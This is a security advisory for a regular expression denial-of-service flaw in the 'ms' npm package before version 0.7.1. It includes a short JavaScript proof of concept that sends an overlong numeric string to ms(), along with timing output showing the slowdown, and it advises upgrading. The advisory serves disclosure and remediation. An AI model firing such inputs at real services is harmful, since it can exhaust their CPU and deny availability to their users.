Severity: moderate

Regular Expression Denial of Service

ms

Overview

Versions of ms prior to 0.7.1 are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.

Proof of Concept

var ms = require('ms');
var genstr = function (len, chr) {
   var result = "";
   for (i=0; i<=len; i++) {
       result = result + chr;
   }
 
   return result;
}
 
ms(genstr(process.argv[2], "5") + " minutea");
 

Results

Showing increase in execution time based on the input string.

$ time node ms.js 10000

real	0m0.758s
user	0m0.724s
sys	0m0.031s

$ time node ms.js 20000

real	0m2.580s
user	0m2.494s
sys	0m0.047s

$ time node ms.js 30000

real	0m5.747s
user	0m5.483s
sys	0m0.080s

$ time node ms.js 80000

real	0m41.022s
user	0m38.894s
sys	0m0.529s

Remediation

Update to version 0.7.1 or later. Alternatively, apply a reasonable length limit to parsed version strings.

Advisory timeline

  1. published

    Advisory published
    Oct 24th, 2015
  2. reported

    Oct 24th, 2015